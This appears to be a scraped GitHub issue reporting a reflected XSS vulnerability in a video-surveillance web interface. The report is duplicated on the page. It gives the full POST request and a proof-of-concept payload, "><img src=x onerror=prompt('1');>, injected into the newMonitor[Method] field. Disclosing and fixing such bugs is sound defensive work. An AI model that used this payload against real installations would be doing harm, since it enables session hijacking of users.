You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Describe the bug
The view monitor, insecurely prints the newMonitor[Method] value on the webpage, without applying any proper filtration, leading to Reflected XSS.
POST Data - view=monitor&tab=source&action=monitor&mid=0&newMonitor[LinkedMonitors]=&origMethod=v4l2&newMonitor[Name]=Monitor1766&newMonitor[ServerId]=&newMonitor[StorageId]=1&newMonitor[Type]=Local&newMonitor[Function]=Mocord&newMonitor[Enabled]=1&newMonitor[RefBlendPerc]=6&newMonitor[AlarmRefBlendPerc]=6&newMonitor[AnalysisFPSLimit]=&newMonitor[MaxFPS]=30&newMonitor[AlarmMaxFPS]=30&newMonitor[Triggers] []=&newMonitor[Protocol]=&newMonitor[Host]=&newMonitor[Port]=80&newMonitor[Options]=&newMonitor[Path]=&newMonitor[User]=&newMonitor[Pass]=&newMonitor[Save JPEGs]=0&newMonitor[VideoWriter]=1&newMonitor[EncoderParameters]=# Lines beginning with # are a comment # For changing quality, use the crf option# 1 is best, 51 is worst quality#crf=23&newMonitor[RecordAudio]=0&newMonitor[RTSPDescribe]=0&newMonitor[LabelFormat]=%N -%d/%m/%y%H:%M:%S&newMonitor[LabelX]=0&newMonitor[LabelY]=0&newMonitor[LabelSize]=1&newMonitor[ImageBufferCount]=20&newMonitor[WarmupCount]=0&newMonitor[PreEve ntCount]=0&newMonitor[PostEventCount]=5&newMonitor[StreamReplayBuffer]=0&newMonitor[AlarmFrameCount]=1&newMonitor[EventPrefix]=Event&newMonitor[SectionLength]=600&newMonitor[FrameSkip]=0&newMonitor[MotionFrameSkip]=0&newMonitor[AnalysisUpdateDelay]=0&newMonitor[FPSReportInterval]=100&newMonitor[DefaultView]=Events&newMonitor[DefaultRate]=100&newMonitor[DefaultScale]=100&newMonitor[WebColour]=red&newMonitor[Exif]=0&newMonitor[SignalCheckP oints]=10&newMonitor[SignalCheckColour]=#0000c0&newMonitor[Device]=/dev/video0&newMonitor[Method]="><img src=x onerror=prompt('1');>&newMonitor[Channel]=0&newMonitor[Format ]=255&newMonitor[Palette]=0&newMonitor[V4LMultiBuffer]=0&newMonitor[V4LCapturesPerFrame]=&newMonitor[Colours]=\&newMonitor[Width]=1280&newMonitor[Height]=72 0&newMonitor[Orientation]=0&newMonitor[Deinterlacing]=0
Payload used - "><img src=x onerror=prompt('1');>
Navigate to the Affected URL, Payload would be triggered.
Expected behavior
Proper escaping of special characters.
Debug Logs
None
The text was updated successfully, but these errors were encountered:
Describe Your Environment
Describe the bug
The view
monitor
, insecurely prints thenewMonitor[Method]
value on the webpage, without applying any proper filtration, leading to Reflected XSS.To Reproduce
Affected URL :
http://localhost/zm/index.php
POST Data -
view=monitor&tab=source&action=monitor&mid=0&newMonitor[LinkedMonitors]=&origMethod=v4l2&newMonitor[Name]=Monitor1766&newMonitor[ServerId]=&newMonitor[StorageId]=1&newMonitor[Type]=Local&newMonitor[Function]=Mocord&newMonitor[Enabled]=1&newMonitor[RefBlendPerc]=6&newMonitor[AlarmRefBlendPerc]=6&newMonitor[AnalysisFPSLimit]=&newMonitor[MaxFPS]=30&newMonitor[AlarmMaxFPS]=30&newMonitor[Triggers] []=&newMonitor[Protocol]=&newMonitor[Host]=&newMonitor[Port]=80&newMonitor[Options]=&newMonitor[Path]=&newMonitor[User]=&newMonitor[Pass]=&newMonitor[Save JPEGs]=0&newMonitor[VideoWriter]=1&newMonitor[EncoderParameters]=# Lines beginning with # are a comment # For changing quality, use the crf option# 1 is best, 51 is worst quality#crf=23&newMonitor[RecordAudio]=0&newMonitor[RTSPDescribe]=0&newMonitor[LabelFormat]=%N -%d/%m/%y%H:%M:%S&newMonitor[LabelX]=0&newMonitor[LabelY]=0&newMonitor[LabelSize]=1&newMonitor[ImageBufferCount]=20&newMonitor[WarmupCount]=0&newMonitor[PreEve ntCount]=0&newMonitor[PostEventCount]=5&newMonitor[StreamReplayBuffer]=0&newMonitor[AlarmFrameCount]=1&newMonitor[EventPrefix]=Event&newMonitor[SectionLength]=600&newMonitor[FrameSkip]=0&newMonitor[MotionFrameSkip]=0&newMonitor[AnalysisUpdateDelay]=0&newMonitor[FPSReportInterval]=100&newMonitor[DefaultView]=Events&newMonitor[DefaultRate]=100&newMonitor[DefaultScale]=100&newMonitor[WebColour]=red&newMonitor[Exif]=0&newMonitor[SignalCheckP oints]=10&newMonitor[SignalCheckColour]=#0000c0&newMonitor[Device]=/dev/video0&newMonitor[Method]="><img src=x onerror=prompt('1');>&newMonitor[Channel]=0&newMonitor[Format ]=255&newMonitor[Palette]=0&newMonitor[V4LMultiBuffer]=0&newMonitor[V4LCapturesPerFrame]=&newMonitor[Colours]=\&newMonitor[Width]=1280&newMonitor[Height]=72 0&newMonitor[Orientation]=0&newMonitor[Deinterlacing]=0
Payload used -
"><img src=x onerror=prompt('1');>
Expected behavior
Debug Logs
The text was updated successfully, but these errors were encountered: